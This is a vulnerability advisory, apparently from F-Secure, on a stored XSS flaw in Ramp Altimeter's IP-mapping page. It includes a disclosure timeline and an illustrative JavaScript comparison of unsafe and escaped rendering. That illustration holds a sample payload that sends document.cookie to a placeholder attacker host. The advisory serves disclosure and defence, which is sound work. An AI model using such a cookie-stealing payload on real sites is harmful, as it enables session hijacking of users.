Ramp Altimeter (https://ramp.com/altitudecdn/altimeter) is a web management interface for enterprise content delivery networks. It provides a GUI for administering Ramp Multicast+ and OmniCache instances, solutions used for efficient live video streaming.
The vulnerable functionality requires authentication and is reached at http://[HOSTNAME]/vdms/ipmapping.jsp. Clicking the “Create…” button opens a dialog box in which a malicious payload can be entered into the “Location” field; the payload is then stored by clicking “Save” at the bottom of the dialog box. Because the value is stored server-side and later rendered back into the page, this is a stored cross-site scripting issue.
Below is an example request (headers only; body and key redacted) that stored a malicious payload on the server:
POST /vdms/rest/services/datastore/createOrEditValueForKey?key=[REDACTED] HTTP/1.1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0
Accept-Encoding: gzip, deflate
Authorization: Basic [REDACTED]
The payload is then executed in the browser of any user who visits http://[HOSTNAME]/vdms/ipmapping.jsp.
As Altimeter is typically deployed within an organization's internal network, this issue can aid an attacker who has already gained a foothold in moving laterally within the network and disrupting business operations. In particular, an attacker can use the vulnerability to target the browsers of application users. Additionally, they can take control of the authenticated session of any user who requests the affected page and perform unauthorized actions within the application as that user.
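The following is an added illustration and is not Ramp Altimeter's code (the JSP is not public, and the exact change made in 2.4.0 is not described in this advisory). It models how a stored "Location" value from the IP-mapping datastore ends up in ipmapping.jsp-style HTML: first the pattern that produces a stored XSS (raw string concatenation), then the output-encoded form that neutralises it. The entry shape, the helper names and the sample payload are all assumptions made for the example.

```javascript
// Added illustration, not Ramp Altimeter's code. The entry shape
// ({ ipRange, location }), the function names and the payload string are
// assumptions chosen for this example.

// Minimal HTML entity encoder, safe for the HTML text context and for
// double- or single-quoted attribute values.
function escapeHtml(value) {
  return String(value)
    .replace(/&/g, '&amp;')   // must run first so later entities are not double-encoded
    .replace(/</g, '&lt;')
    .replace(/>/g, '&gt;')
    .replace(/"/g, '&quot;')
    .replace(/'/g, '&#x27;');
}

// Vulnerable pattern: the stored "Location" value is concatenated verbatim
// into the markup, so any HTML or script in it runs in every viewer's browser.
function renderRowUnsafe(entry) {
  return `<tr><td>${entry.ipRange}</td><td>${entry.location}</td></tr>`;
}

// Hardened pattern: every untrusted field is encoded for the context it is
// placed in (here, HTML text) before it reaches the document.
function renderRowSafe(entry) {
  return `<tr><td>${escapeHtml(entry.ipRange)}</td><td>${escapeHtml(entry.location)}</td></tr>`;
}

// Simple check used below: does the rendered markup still contain a live
// <script> start tag?
function containsRawScriptTag(html) {
  return /<script\b/i.test(html);
}

// Constructed sample of what an attacker could type into the "Location"
// field of the "Create..." dialog. It exfiltrates the viewer's cookies to an
// attacker-controlled host (placeholder domain).
const SAMPLE_PAYLOAD =
  '<script>fetch("https://attacker.example/?c=" + encodeURIComponent(document.cookie))</script>';

const sampleEntry = { ipRange: '10.0.0.0/8', location: SAMPLE_PAYLOAD };

console.log('unsafe rendering:', renderRowUnsafe(sampleEntry));
console.log('safe rendering:  ', renderRowSafe(sampleEntry));
console.log('script tag survives (unsafe):', containsRawScriptTag(renderRowUnsafe(sampleEntry)));
console.log('script tag survives (safe):  ', containsRawScriptTag(renderRowSafe(sampleEntry)));
```

Encoding at output time, as in `renderRowSafe`, is the fix that matters: rejecting angle brackets on the way in via the REST endpoint would also help, but the datastore endpoint is a separate code path from the dialog, so input filtering alone leaves the page exposed to any value that reaches the store by another route.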
To address the above issue, update to the following version of the Altimeter software, which contains a fix for the vulnerability:
AltitudeCDN Altimeter v2.4.0
Additionally, because storing the payload requires an authenticated account, strong credentials should be used for all accounts within the application, and organizations should consider restricting access to the management interface to an allow-listed set of IP addresses.
Vulnerability discovered by Rob Russell
2019-07-29  F-Secure informs the vendor of the issue in Altimeter 2.1.0
2019-07-30  Vendor confirms the vulnerability is still present in Altimeter 2.3.1
2019-07-30  F-Secure informs the vendor of its intention to publish an advisory and asks for an estimated patch date
2019-07-30  Vendor informs F-Secure they plan to patch in version 2.4.0 with an ETA of late September
2019-09-18  F-Secure requests a status update
2019-09-18  Vendor informs F-Secure that the patch is scheduled to be released in Q1 2020
2020-01-13  F-Secure requests a status update and sends a draft of the advisory to the vendor
2020-02-10  Vendor confirms that the vulnerability is patched in version 2.4.0 and approves the advisory